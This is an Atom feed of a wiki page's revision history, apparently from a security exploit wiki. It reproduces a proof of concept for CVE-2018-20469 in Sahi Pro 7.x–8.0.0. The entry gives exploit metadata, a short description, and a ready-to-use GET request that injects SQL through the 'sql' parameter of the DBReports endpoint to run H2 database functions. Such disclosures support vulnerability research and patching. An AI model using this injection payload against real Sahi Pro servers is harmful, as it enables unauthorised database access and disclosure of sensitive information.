<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2018-20469_Sahi_pro_8.x_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2018-20469 Sahi pro 8.x SQL注入漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2018-20469_Sahi_pro_8.x_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2018-20469_Sahi_pro_8.x_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-08T07:03:54Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2018-20469_Sahi_pro_8.x_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=2010&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Sahi pro ( &lt;= 8.x ) sensitive information disclosure by SQL injection. # Date: 17-06-2019 # Exploit Author: Goutham Madhwaraj ( https://barriers...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2018-20469_Sahi_pro_8.x_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=2010&amp;oldid=prev"/>
		<updated>2021-05-02T04:30:51Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: Sahi pro ( &amp;lt;= 8.x ) sensitive information disclosure by SQL injection. # Date: 17-06-2019 # Exploit Author: Goutham Madhwaraj ( https://barriers...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Sahi pro ( &amp;lt;= 8.x ) sensitive information disclosure by SQL injection.&lt;br /&gt;
# Date: 17-06-2019&lt;br /&gt;
# Exploit Author: Goutham Madhwaraj ( https://barriersec.com )&lt;br /&gt;
# Vendor Homepage: https://sahipro.com/&lt;br /&gt;
# Software Link: https://sahipro.com/downloads-archive/&lt;br /&gt;
# Version: 7.x , &amp;lt;= 8.x&lt;br /&gt;
# Tested on: Windows 10&lt;br /&gt;
# CVE : CVE-2018-20469&lt;br /&gt;
# POC-URL : https://barriersec.com/2019/06/cve-2018-20469-sahi-pro/&lt;br /&gt;
&lt;br /&gt;
Description :&lt;br /&gt;
&lt;br /&gt;
An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A parameter in the web reports module is vulnerable to SQL injection. This can be exploited to inject SQL queries and run standard h2 system functions.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
POC :&lt;br /&gt;
&lt;br /&gt;
vulnerable URL :&lt;br /&gt;
&lt;br /&gt;
''' replace the ip and port of the remote sahi pro server machine '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# here sql query is passed directly as part of GET request which can be modified to run standard h2 database functions. in the following POC , &amp;quot;memory_used()&amp;quot; function is injected , which is reflected in &amp;quot;status&amp;quot; column of reports page.&lt;br /&gt;
&lt;br /&gt;
http://&amp;lt;ip&amp;gt;:&amp;lt;port&amp;gt;/_s_/dyn/pro/DBReports?sql=SELECT DISTINCT memory_used() AS ROWSTATUS, SCRIPTREPORTS.SCRIPTREPORTID,SCRIPTREPORTS.SCRIPTNAME,SUITEREPORTS.* FROM SUITEREPORTS,SCRIPTREPORTS&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>